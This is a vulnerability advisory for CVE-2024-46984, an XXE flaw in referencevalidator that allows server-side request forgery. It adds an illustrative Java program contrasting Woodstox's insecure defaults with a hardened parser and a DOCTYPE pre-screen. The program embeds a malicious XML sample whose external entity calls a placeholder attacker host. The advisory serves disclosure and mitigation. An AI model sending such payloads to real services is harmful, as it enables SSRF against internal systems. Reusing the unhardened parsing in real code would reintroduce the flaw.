PT-2024-32318 · Unknown · Referencevalidator+1

Alexey-Tschudnowsky · Published 2024-09-19 · Updated 2024-09-25 · CVE-2024-46984

CVSS v3.1: 8.6 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions: referencevalidator versions prior to 2.5.1

Description: The profile location routine in the referencevalidator commons package is vulnerable to an XML External Entity (XXE) attack because of the insecure defaults of the Woodstox WstxInputFactory it uses. A malicious XML resource can cause referencevalidator to issue network requests, which amounts to a Server-Side Request Forgery (SSRF). The vulnerability affects applications that use referencevalidator to process XML resources from untrusted sources.

Recommendations: For versions prior to 2.5.1, update to version 2.5.1 or a more recent one to resolve the issue. As a temporary workaround, pre-process or manually inspect input XML resources for DTD declarations or external entities before handing them to referencevalidator. Because general entities can only be declared inside a DTD, rejecting any document that contains a DOCTYPE declaration is a simple check that fails closed.
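The following Java program is an added illustration of the insecure-default problem and of the two mitigations described above (hardening the factory, and pre-screening input for a DTD). It is not code from referencevalidator or from the Woodstox project; it assumes woodstox-core is on the classpath, and the XML sample, the placeholder host attacker.invalid and all method names are constructed for the example. Calling the Woodstox factory with its defaults on the sample causes the parser to attempt a fetch of the entity URL, which is the SSRF the advisory describes.

```java
import java.io.StringReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
import com.ctc.wstx.stax.WstxInputFactory;

public class WoodstoxXxeDemo {

    // Constructed sample: a document whose DTD declares an external entity.
    // The host attacker.invalid is a placeholder; a parser that processes the
    // DTD and resolves external entities will try to fetch this URL when it
    // expands &xxe; in the element content.
    static final String MALICIOUS_XML =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE profile [\n"
      + "  <!ENTITY xxe SYSTEM \"http://attacker.invalid/callback\">\n"
      + "]>\n"
      + "<profile>&xxe;</profile>\n";

    // Woodstox as shipped: DTD processing and external entity resolution are
    // enabled, so the entity reference triggers an outbound request.
    static XMLInputFactory defaultFactory() {
        return new WstxInputFactory();
    }

    // Hardened factory: switch off DTD processing and external entities through
    // the standard StAX properties, which Woodstox honours.
    static XMLInputFactory hardenedFactory() {
        XMLInputFactory f = new WstxInputFactory();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, Boolean.FALSE);
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);
        return f;
    }

    // Workaround-style pre-screen: entities can only be declared in a DTD, so a
    // document without a DOCTYPE declaration cannot carry an external entity.
    // A DOCTYPE inside a comment also trips this check; that is a false
    // positive we accept because the check is meant to fail closed.
    static boolean containsDoctype(String xml) {
        return xml.contains("<!DOCTYPE");
    }

    // Parses the document and returns the concatenated character content of
    // the root element, which is where an expanded entity would appear.
    static String readText(XMLInputFactory f, String xml) throws XMLStreamException {
        XMLStreamReader r = f.createXMLStreamReader(new StringReader(xml));
        StringBuilder sb = new StringBuilder();
        try {
            while (r.hasNext()) {
                if (r.next() == XMLStreamConstants.CHARACTERS) {
                    sb.append(r.getText());
                }
            }
        } finally {
            r.close();
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        if (containsDoctype(MALICIOUS_XML)) {
            System.out.println("pre-screen: DOCTYPE found, document would be rejected by the workaround");
        }
        for (String mode : new String[] {"default", "hardened"}) {
            XMLInputFactory f = mode.equals("default") ? defaultFactory() : hardenedFactory();
            try {
                String text = readText(f, MALICIOUS_XML);
                System.out.println(mode + ": parsed, content = " + text);
            } catch (XMLStreamException e) {
                // default: the parser already attempted the network fetch and
                //          fails only because the placeholder host is unresolvable.
                // hardened: the DTD is never processed, so the entity is
                //           undeclared and no request is issued.
                System.out.println(mode + ": parse failed: " + e.getMessage());
            }
        }
    }
}
```

The point to take from running it is the order of events in the default branch: the outbound connection is attempted before any error is reported, so the parse failure does not mean the request was suppressed. Only the hardened factory (or a pre-screen that rejects the DOCTYPE up front) prevents the request. Applying both is reasonable in a temporary-mitigation setting, since the pre-screen protects callers that cannot reconfigure the factory inside a third-party library.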

Tags: Exploit · Fix · XXE

Weakness Enumeration

Related Identifiers:
CVE-2024-46984
GHSA-68J8-FP38-P48Q

Affected Products:
Woodstox WstxInputFactory
referencevalidator